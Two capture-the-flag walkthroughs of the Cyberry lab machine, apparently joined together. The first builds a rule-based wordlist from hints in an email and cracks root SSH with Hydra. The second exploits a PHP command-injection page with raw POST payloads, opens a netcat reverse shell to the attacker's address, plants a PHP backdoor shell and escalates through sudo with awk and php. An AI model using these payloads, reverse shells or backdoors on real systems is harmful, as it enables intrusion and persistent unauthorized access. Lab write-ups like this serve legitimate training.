drwxr-xr-x 9 root  root  4096 Nov 29 23:58 ..
-rw------- 1 chuck chuck 6175 Jan 18 03:56 .bash_history
-rw-r--r-- 1 chuck chuck  220 Nov 19 13:18 .bash_logout
-rw-r--r-- 1 root  root  9182 Nov 30 22:14 .bashrc
drwx------ 3 chuck chuck 4096 Nov 30 23:26 .deleted
-rw-r--r-- 1 chuck chuck  675 Nov 19 13:18 .profile
$ sudo -u chuck php /tmp/shell.php "ls -al /home/chuck/.deleted/"
total 16
drwx------ 3 chuck chuck 4096 Nov 30 23:26 .
drwxr-xr-x 3 chuck chuck 4096 Nov 30 23:21 ..
-rw------- 1 chuck chuck 1965 Dec  7 16:47 deleted
drwx------ 2 chuck chuck 4096 Nov 30 23:27 ssh_stuff
Reading the contents of the file deleted under the .deleted directory:
$ sudo -u chuck php /tmp/shell.php "head -n 40 /home/chuck/.deleted/deleted"
From:  Berry, Chuck (chuckberry@cyberry)
Sent:   Wednesday, November 22, 2017 2:52pm
To:  Nick, Chuck (nickberry@cyberry)
Subject: Re: Christmas Meal
Thanks Nick, that might just help me out!
He did give me a few minor clues...
The password starts with "che" and ends with "rry"
letter e is used three times
letter c is used twice
letter r is used twice
letter b is used twice
letter a is used twice
The only other letters in the password were h,w,m & y
I think I'll probably have to write a little script to bruteforce SSH
with what I already know. If I get it done before close of business 
I'll get onto sorting out the Christmas meal. Promise!
Thanks again
-------------------------------------------------------------------
Ah ok buddy. I don't know if it helps you in any way
but I saw the password jotted down on a post-it note in his office
the other day! I can't recall it exactly but I do remember it being
a concatenated 4-word password....You know like "eatberriesandsmile"
It wasn't that, but it was something like that.... in fact I'm pretty
sure one of those four words was actually latin... Now that I'm thinking
about it I'm pretty sure it was "baca".... well 99% sure. 
I've been studying latin for a few months now, so it kinda 
stuck in the memory
Please don't tell anyone I told you this b.t.w! :-)

The mail talks about the root password. Based on the rules, I followed this methodology to create a wordlist.
1) Since the rules talk about 4 concatenated words, I chose words from the American English wordlist at /usr/share/dict/american-english.
2) The first word starts with ‘che’, the last (4th) word ends with ‘rry’, the 2nd or 3rd word is ‘baca’, and the remaining 2nd or 3rd word is an English word.
3) Based on the defined occurrences, we can eliminate the letter ‘a’, as it already appears twice in ‘baca’.
First I extract words from the American English wordlist starting with che and store them in a file che.txt.
Then iterate over che.txt to remove words containing letters that are not permitted by the rules. Here I also eliminated ‘r’, as it already appears twice in ‘rry’. [grep -v inverts the match: the first grep lists all words starting with che, and each pass of the loop then drops every word containing the current letter in char, leaving only words made of the permitted letters]
root@kali:~# mkdir pass
root@kali:~# cd pass
root@kali:~/pass# grep ^che /usr/share/dict/american-english > che.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q r s t u v x z; do grep -v $char che.txt > temp.txt; mv temp.txt che.txt;done
Next, I extract words from the American English wordlist that end with rry and store them in a file rry.txt. Then iterate over rry.txt to remove words containing letters that are not permitted by the rules:
root@kali:~/pass# grep rry$ /usr/share/dict/american-english > rry.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q s t u v x z; do grep -v $char rry.txt > temp.txt; mv temp.txt rry.txt;done
At last, generate another wordlist, dict.txt, containing only words made of letters permitted by the ruleset:
root@kali:~/pass# cp /usr/share/dict/american-english dict.txt
root@kali:~/pass# for char in  a d f g i j k l n o p q s t u v x z; do grep -v $char dict.txt > temp.txt; mv temp.txt dict.txt;done
Finally, I create a Python script that iterates through the three files and adds ‘baca’ as the 2nd or 3rd word of a 4-word concatenation, which is then checked against the defined letter occurrences. If it matches, the candidate is written to a file, producing a rule-based wordlist. Note that some uppercase words that don’t fit the ruleset also end up in the wordlist. This script was done quickly, and anyone is welcome to write a better version.

def check_occurence(word):
    # Letter counts the mail gives for the whole password
    e_count = word.count('e')
    c_count = word.count('c')
    r_count = word.count('r')
    b_count = word.count('b')
    a_count = word.count('a')
    if e_count == 3 and c_count == 2 and r_count == 2 and b_count == 2 and a_count == 2:
        return True
    else:
        return False

first_words = open('che.txt', 'r').readlines()
end_words = open('rry.txt', 'r').readlines()
flag = 'baca'
mid_words = open('dict.txt', 'r').readlines()
final_list = open('final_list', 'a')
for first_word in first_words:
    for mid_word in mid_words:
        for end_word in end_words:
            # [:-1] strips the trailing newline from each dictionary line
            test_word1 = first_word[:-1] + flag + mid_word[:-1] + end_word[:-1]
            test_word2 = first_word[:-1] + mid_word[:-1] + flag + end_word[:-1]
            # both candidates contain the same letters, so one count check covers both
            if check_occurence(test_word1):
                final_list.write(test_word1 + "\n")
                final_list.write(test_word2 + "\n")
final_list.close()
Executing it creates the wordlist final_list:
root@kali:~/pass# python wordlist_gen.py 
root@kali:~/pass# ls
che.txt  dict.txt  final_list  rry.txt  wordlist_gen.py
Finding the correct credentials with Hydra to gain root access:
root@kali:~/pass# hydra -l root -P final_list ssh://192.168.1.104
[22][ssh] host: 192.168.1.104   login: root   password: chewbacabemerry
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-18 10:31:08
Finally, gaining SSH access as root user with password chewbacabemerry
=====
Walkthru B


Arbitrary Code Injection


The ub3r-s3cur3 section was basically a web page with a dropdown where you could select between Google and Yahoo, and a button that seemed to run a DNS lookup command on the selected site. This looked an absolute cert for a code injection exploit:


When I got access to the box later, I looked at the web page code (shown below). The code basically runs any Linux command posted in the 'host' parameter (using the PHP system() method), as long as you complete the nslookup command first.

<?php
  $host = 'google';
  if (isset( $_POST['host'] ) )
    $host = $_POST['host'];
  system("nslookup " . $host);
?>
So we can replace $host with anything we like by manipulating the POST request using Burp. This was my initial test:
POST /ub3r-s3cur3/index.php HTTP/1.1
Host: 192.168.1.182:61955
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.182:61955/ub3r-s3cur3/index.php
Cookie: PHPSESSID=l51cr2m3572ptqn6blv4eorkh0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

host=google.com; uname -a;
This test simply injected the uname -a Linux command into the request. Here was the result:
HTTP/1.1 200 OK
Date: Tue, 23 Jan 2018 19:34:40 GMT
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Length: 411
Connection: close
Content-Type: text/html; charset=UTF-8

Server: 192.168.1.254
Address: 192.168.1.254#53

Non-authoritative answer:
Name: google.com
Address: 216.58.204.14

Linux android-bbbc5ded6a7accf3 3.16.0-4-686-pae #1 SMP Debian 3.16.43-2+deb8u5 (2017-09-19) i686 GNU/Linux
I was in business! It was time to inject a reverse shell. I used the following post parameter: host=google.com;nc -e /bin/sh 192.168.1.71 4444;. I started a netcat listener and then sent the post request

Backdoor

Before I went looking for weaknesses to exploit I decided to install a backdoor that I could use to get shell access later. I didn't want to carry out all those previous steps every time I wanted to get access. So I executed the following commands on the server (basically creating a new PHP web page called shell.php). The PHP script created a reverse shell to my Kali box on port 666:
$ cd /var/www/html
$ echo '<?php shell_exec(" mknod /tmp/backpipe p"); shell_exec(" /bin/sh 0</tmp/backpipe | nc 192.168.1.71 666 1>/tmp/backpipe "); ?>' > shell.php
$

User Enumeration

see the link for info but no success here

Unalias

I had noticed earlier in the engagement that the .bashrc had a bunch of alias commands in it to simulate the 'intrusion detection' system. So this time when I had assumed the chuck account I was going to use the unalias -a command to temporarily remove all of the aliases.
So off I went again... I connect as nick using SSH:
nick@cyberry:$ sudo -u terry /home/nick/invoke.sh /bin/bash -i
terry@cyberry:/home/nick$ sudo -u halle awk 'BEGIN {system("/bin/bash")}'
halle@cyberry:/home/nick$ sudo -u chuck php -r 'system("/bin/bash -i");' 
chuck@cyberry:/home/nick$ unalias -a
Now I was able to look around and see if there was anything chuck could do:
chuck@cyberry:$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for chuck:
Hmm, nothing without chuck's password! OK, so I had a look around to see what I could find as chuck.
